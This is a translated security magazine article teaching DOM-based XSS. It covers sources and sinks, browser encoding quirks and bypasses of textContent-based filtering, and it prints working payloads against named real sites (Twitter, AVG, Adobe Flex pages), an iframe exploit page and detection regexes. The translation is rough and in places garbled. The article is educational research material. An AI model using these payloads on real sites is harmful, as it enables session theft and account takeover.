Finding Loopholes: DOM Based XSS Guide



XSS is not without reason at the top of the list of hazards OWASP TOP 10. Any sensible programmer knows about them. But this does not interfere with statistics: eight out of ten web applications have XSS vulnerabilities. And if we recall the personal experience of bank pentest, the picture "ten out of ten" seems more real. It seems that the topic has been driven away from and to, however there is a subtype of XSS, which is lost for various reasons. This is DOM Based XSS. And just about him I am writing today.

Focus shift

Attacks on customers are one of the major security challenges of the web. XSS, Clickjacking, CSRF - all of them are directed precisely against ordinary users, and not against server system components. And if earlier it was possible to get a decent profit by exploiting vulnerabilities in the server part (and penetrating inside the corporate network), now hackers' focus is shifting to the client part. For this reason, XSSs, which many are skeptical of, can do a good job.

What you can skip

First, I’ll introduce two explanations related to this article. First. The main goal is to introduce DOM Based XSS to those people who have bypassed this type of vulnerability. Talk about the intricacies of exploitation, as well as share thoughts on how to properly put the process of identifying such vulnerabilities. This is a kind of educational program. Therefore, depending on your knowledge, you can skip one or another piece. Now the second. About The whole truth about XSS, or why cross-site scripting is not a vulnerability? ". It talked about the fact that XSS is just an attack, not a type of vulnerability. I remember that this sparked a series of fierce disputes and “crusades,” which was very amusing ... But I will call XSS both an attack and a vulnerability, although the statement “XSS is a type of attack” is true. It will be easier this way, although correctly understanding the meaning is, of course, important.

XSS ABC

I can’t help but recall what we need XSSs for. No, not in order to execute our JavaScript code from the user. For this purpose, we can simply drag it to a website completely controlled by us (http://evil.com).

The task is to execute OUR JavaScript code in the user's browser in the context of the attacked domain (for example, in the context of gmail.com). That is, the goal is to circumvent Same Origin Policy, because almost all browser security is on SOP.

Further, what will the XSS give us? Of course, in the simplest case, we just get the user's session cookies. But in fact, we can do everything that JavaScript can: control what is displayed on the page and what is sent to the server, emulate user actions, steal data from forms ... It is important to understand that XSS, depending on the situation and skill, can become a powerful weapon. Now about the classification. Usually distinguished are “stored” (“stored XSS” or “Type 2”) and “reflected” (“reflected XSS” or “Type 1”). In the stored ones, we send an XSS-ku, and it is stored on the server, and then we send users to this page. In the "mirrored", our XSS returns in the body of the response from the server to a specific request from the XSS itself. But here something is missing. And as you probably guessed, this is the topic of today's DOM Based XSS (or Type 0) article. For various reasons (some of which will be described later), this type of XSS is little known, even in our circles ... Perhaps this is due to the fact that they can not often be scanned by scanners. But let's move on to theory.

What is DOM Based XSS?

To answer the question, you must first understand what DOM is. I'll start from afar, with a favorite topic - XML. There are two main types of parsers for XML. The first - SAX (Simple API for XML) - is a type of parsers with sequential processing of documents. He reads the item and generates events. It requires few resources, but is very simple. The second - DOM (Document Object Model) - fully loads the entire document into memory and presents it in the form of a tree. But more importantly, it allows you to completely manipulate it. You can add, delete, change the structure, the elements themselves (nodes) and their attributes. What does XML have to do with it? Despite the fact that for some time HTML is a subspecies of XML. In general, this concept is used in browsers. All received HTML-document from the server is represented as a DOM tree in the browser, and in addition, it is possible to change it, using the standard API through one or another language. In our case, this is mainly JavaScript.DOM consists of objects nested in each other in a hierarchical order, which are called nodes. Each node in the structure represents an HTML element located on the page. The root element is document. The value stored in the nodes is text. In addition, nodes have attributes that can also be accessed. In fig. Figure 1 shows the simplest HTML file, as well as the hierarchy that the browser creates. You can read more about the DOM and try using JavaScript examples here: goo.gl/suiZE .


Fig. 1. The simplest DOM tree
And, as already mentioned, we have the ability to manipulate the DOM from JavaScript. And what does this give us? In certain cases, using these methods (if the data is not correctly filtered), we can modify the DOM of the attacked site and achieve the execution of our JavaScript code in the context of the attacked site. That is, the essence is the same XSS. The simplest example:

<body>
<script>document.write(location.href);</script>
</body>

After receiving such HTML, the browser will execute JavaScript code and add a line to the page body (document.write), taking its value from location.href. The problem here is that the hacker can control the location.href value and insert his JavaScript, which will also be executed. That is, if this page is test.html, then to add our code, we need our victim to go to the following URL (see Fig. 2):

http://victim.com/test.html#<script>alert(document.cookie);</script>



Fig. 2. DOM Based XSS
Fig. 2.1. Classic DOM Based XSS
It is important to note here that in Firefox this example will not work. For IE and Chrome, you just need to follow the link, and not just write a script in the address bar, since in the second case everything will be URLed before executing the code (it will become “% 3Cscript% 3Ealert (1);% 3C / script% 3E”) .But the second example will work for everyone:

<body>
<script>
var l = location.hash.slice(1);
eval(l); 
</script>
</body>

Exploitation:

http://victim.com/test_eval.html#alert(document.cookie)

The XSS option is slightly more non-standard:

<body>
<p>Hello my window name is:
<script>document.write(window.name);</script>
</p>
</body>

Operation (open the victim’s page with ours so that we can control window.name) - Fig. 3:

<script>window.open("http://victim.com/test_window.html", "<script>alert('XSS')</scr" + "ipt>", "", false);</script>

I hope it became clear where the legs for the DOM XSS are coming from.


Fig. 3. DOM Based XSS from window.name

Terminology?

Strange as it may seem, the attack itself is very bearded. At least in 2005, Amit Klein ( gomit.gl/OOb3U ) wrote a meaningful idea about the third form of XSS, although the DOM XSS itself had already been found before. In his work, a list was presented of where the data from the user can come from (Fig. 4) and what dangerous functions can lead to XSS (Fig. 5). But, oddly enough, the topic has been developed and rethought in recent years - thanks in large part to people like Stefano Di Paola and Mario Heiderich.


Fig. 4. Откуда…


Fig. 5. Where ...

Most importantly, a certain terminology has been developed - what we control and can pass to the page is called “source”, and the end is where the data comes in, the dangerous functions with which we can attack and exploit our XSS are called “ sink ". I won’t even try to search for Russian analogs of terms. And if sinks have not changed much (added), the understanding of sources has grown greatly, which slightly changes the understanding of the attack (its classification), but more on that later. It’s important to understand what is what in principle. There are too many details. Therefore, one of the significant resources when digging the DOM XSS is the domxsswiki project ( goo.gl/yycvJ ), which presents a list of the main source and sink, as well as their subtleties in the context of various browsers. So, about the new classification that Aspect Security specialists recently presented (as a trolling, probably) - see fig. 6. This classification is accurate and emphasizes the essence of the DOM XSS. It doesn’t matter where the input from the attacker comes from (from a specific server response, from the client, from the static part of the page) - it is important that they are used in critical functions by the client part. For example, imagine a situation that we can send our nickname to a server and it will be stored somewhere there - there is potential for Stored XSS. But if filtering interferes with us, it would seem that we can’t do anything already. And if our nickname is used somewhere else, but in the context of the client side and at the same time it is used somewhere to modify the DOM? It turns out that we have a second attempt for XSS (now DOM XSS), because, perhaps, we do not need the characters that were needed for Stored XSS, but were filtered on the server.


Fig. 6. New classification?


Fig. 7. Новая версия типов source меняет классификацию

Fig. 8. Where (new version) ...
What is the essence of this part? It is to make you understand that there are important general concepts, but DOM XSS is a very specific and non-trivial thing in many ways.

DOM XSS Specifics

So, after general thinking on the topic and a few examples, what can we highlight specific in the DOM XSS? Firstly, the DOM XSS is primarily a problem of the client side of the web application. I’ll clarify: this is not a client problem, but a problem of the client part of the application. This is incorrect filtering / use of data received from untrusted sources in the client part of the web application, that is, mainly in JavaScript. This item has several consequences. DOM XSS can be on “any” page, even on plain HTML if JavaScript is used there. Previously, vulnerability searches focused on scripts, on pages where we could enter some data, and also on pages where we got the result, - while the static pages were uninteresting as such. Now even “static” can bring vulnerability. Quite often for DOM XSS we don’t need to send XSS to the server at all. The three examples above are proof of this. For the first two examples, it is important to note that browsers (according to standards) do not send to the server what is after the "#" symbol. This Fragment identifier is a special part of the URI scheme used initially to create links to parts of a document. Wiki example: “http://www.example.org/foo.html#bar” refers to an element with id = bar on the foo.html page. Its trick is that it is not sent to the server, but is accessible from JavaScript. Such an identifier is constantly used in web 2.0 sites (the Gmail service is an example of this). So “http://victim.com/test.html#” from the first example will force the browser to make a request to test.html, but without XSS, but in JS there will be a full line. And no server protection features (filtering user data, all kinds of WAF or IPS) will work. The problem lies mainly with the client side of the web application. This is the first point. Secondly, we, as a rule, cannot use standard techniques and tools that we use to identify classic XSS and SQL injections, since they are designed specifically to identify server problems. Thirdly, although we, in fact, have the ability to access the sources (JavaScript is delivered to the client), it’s a very non-trivial task to correctly and deeply search for such vulnerabilities. Subtleties and tricks - at least dig a shovel :).

Difficulties and Chips

So, in the continuation of the last paragraph, I want to bring an indicative picture from the presentation of Stefano Di Paola (Fig. 9). Parsing JavaScript is a terrible thing, especially with standard tools. Yes, Mario Heiderich wrote two regexps to identify the main sink and source:

/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/

/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/

But you have to go through the entire dataflow to understand where it comes from, where and how it gets ... Not only that, besides searching for a potential DOM XSS vulnerability, you also need to write an exploit for it. And browsers are different, and, worse, their behavior is different. Not to mention the fact that browsers have means to counter the reflected XSSs - and they also have to be circumvented. If you take the first example and the value in location.href, then the URL (general view) is stored in it:

scheme://user:pass@host/path/to/page.ext/Pathinfo;semicolon?search.location=value#hash=value&hash2=value2

And browsers have different urlencods for URL data. Firefox, for example, encodes the <> characters after #, but IE does not .E:

http://host/path/to/page.ext/test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test<a"'%0A`=%20+%20>;#test<a"'%0A`=%20+%20>;

Ff:

http://host/path/to/page.ext/test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E?test%3Ca%22%27%0A%60=%20+%20%3E;#test%3Ca%22%27%0A%60=%20+%20%3E; 

Therefore, the first attack will be suitable only for IE, Chrome. At the same time, if the vulnerable page had code

 
then the exploit would work in all browsers, since the FF for this object stores the value in decoded form. Next, another example of browser tricks. There is, for example, a vulnerable page that adds only the server name from referer to the script:

document.write('<script src="http://Host/image.gif?t='+(referrer.split("/")[2])+'></script>');

It would seem that what can be done here? Yes, we can influence the referer! All we need is to lure a user to our site and redirect him from the page we need to a vulnerable one. In this way, we will influence the referer field. But here it seems like a bummer begins ... But no. Stefano found that IE supports special characters in the host name. That is, we can create a subdomain of our own “.evil.com” or, as in Stefano’s example, ““ onreadystatechange = eval (name) .attacker.com. ”In addition to the browser pieces and differences of the native JavaScript code, there are also all kinds of JS frameworks which is used more than everywhere. The same jQuery has many wrappers over standard sinks (see Fig. 10. .


Fig. 9. Анализ JavaScript — неблагодарное занятие


Fig. 10. jQuery and other frameworks make analysis even more difficult

Bypass filters

Hopefully an understanding regarding DOM XSS has begun to emerge. Now indirectly touch protection. Of course, the simplest option is to abandon JS on the client side :). But it is clear that this is unrealistic. The next option is not to use the safe functions of changing the DOM, as well as to implement filtering of user data ... But, as you probably noticed, the DOM XSS is still that Temko. It’s like a kind of multi-colored bubbling entity that has no special borders. Therefore, there is no sensible understanding among the masses, and therefore, from the point of view of protecting mistakes, a lot is allowed. Not so long ago I read an excellent article which we will now analyze. It describes two examples of “safe” DOM changes through the use of user data filtering. Example 1. Using element.textContent, which is used to set / read the text value of a node. It is also used to filter HTML. For instance:

var div = document.createElement('div');
div.innerHTML = 'Hello <a href="http://bob.com">Bob</a>!';
console.log(div.textContent);
// Hello Bob!;

Here div.textContent cut “ Bob ” when adding an element. It seems to be safe and we can’t add an XSS-ku? But no. This method has a feature: it converts HTML entities back to HTML:

var div = document.createElement('div');
div.innerHTML = 
  'Hello <a>&lt;script&gt;alert(&quot;!&quot;)&lt;/script&gt;</a>!';
console.log(div.textContent);
// Hello <script>alert("!")</script>!

That is, with small frauds, we can simply implement XSS. If you use this method in a slightly different order

var div = document.createElement('div');
div.textContent = '<span>Foo & bar</span>';
console.log(div.innerHTML)
// &lt;span&gt;Foo &amp; bar&lt;/span&gt;

it turns out, again, it seems to be a completely safe result. The author notes that document.createTextNode has a similar behavior. The characters <,>, & were replaced with the corresponding entities. And this method is also used for “filtering”. But you, probably, noticed that here in filtering there is no enough important symbol - a quote. And this fact from the theory of classical XSS reminds us of the possibility of using XSS based on events, which the author shows by example:

function escapeHtml(str) {
var div = document.createElement('div');
div.appendChild(document.createTextNode(str));
return div.innerHTML;
};
var userWebsite = '" onmouseover="alert(\'derp\')" "';
var profileLink = '<a href="' + escapeHtml(userWebsite) + '">Bob</a>';
var div = document.getElementById('target');
div.innerHtml = profileLink;
// <a href="" onmouseover="alert('derp')" "">Bob</a>

Oddly enough, the problem stretches and “flows” into other solutions. For example, jQuery has the same features in .text (). In addition, some filtering information can be found in the same domxsswiki.

Reality

A couple of examples. Firstly, the classic version that was found on Twitter: XSS, oddly enough, was trivial:

http://twitter.com/#!javascript:alert(document.domain);

The javascript pseudo-handler is substituted into location and, as a result, our code is executed. A modern example from the AVG website:

//display the correct tab based on the url (#name)
var pathname = $(location).attr('href');var urlparts = pathname.split("#");

The operation is again trivial:

http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>

Further, a slightly stranger example, when it seems like the vulnerability is close, but it is not easy to exploit it. This vulnerability was found in Adobe Flex 3. The vulnerable page - /history/historyFrame.html - is still massively located on the Web (including on "powerful" portals).

function processUrl() 
{
        var pos = url.indexOf("?");
        url = pos != -1 ? url.substr(pos + 1) : "";
        if (!parent._ie_firstload) {
            parent.BrowserHistory.setBrowserURL(url);
            try {
                parent.BrowserHistory.browserURLChange(url);
            } catch(e) { }
        } else {
            parent._ie_firstload = false;
        }
}

var url = document.location.href;
processUrl();
document.write(url);

If you look at the last lines, it seems - XSS-ka here, on a silver platter. But no, there is a problem - checking parent._ie_firstload in the processUrl function. The vulnerability cannot be directly exploited - the javascript simply will not reach the right place. Since the page does not have such an object as parent, JavaScript will crash to "parent.BrowserHistory.setBrowserURL (url);". But we can cheat and create a page on our website that will contain two frames:

<html>
 <body>
  <iframe name="_ie_firstload"></iframe>
  <iframe src="http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>"></iframe>
 </body>
</html>

Thus, we create a frame to which the code from the vulnerable page will access as a result of checking “if (! Parent._ie_firstload)”. And since now an object already exists, the check goes to Else and the function successfully completes, giving the opportunity to start the DOM XSS. But this method has its own subtleties. For example, FF prohibits referring to parent from another domain, and therefore, according to the author’s experience, it was possible to use it only against IE. If you are interested in the DOM XSS topic, be sure to look at other examples to gain experience: goo.gl/ZWei3 , goo .gl / gZawa , goo.gl/XRwBT , goo.gl/plqs9 .

Afterword

Perhaps I will repeat, but, summing up, I would like to say that DOM Based XSS is that incomprehensible animal. And the more obscurity and subtleties - the more bugs. Especially since JavaScript is more and more “pulling the blanket over itself,” and the web is becoming more dynamic. In general, learning is light, and creating is wonderful :). Successful reserch!


Впервые опубликовано в журнале "Хакер" от 05§ 2.1. .

Subscribe to Hacker



P.S. Можете поделиться знаниями и интересными идеями, написав для ][? Дайте знать :). Мы платим гонорары, но это не должно быть главной мотивацией.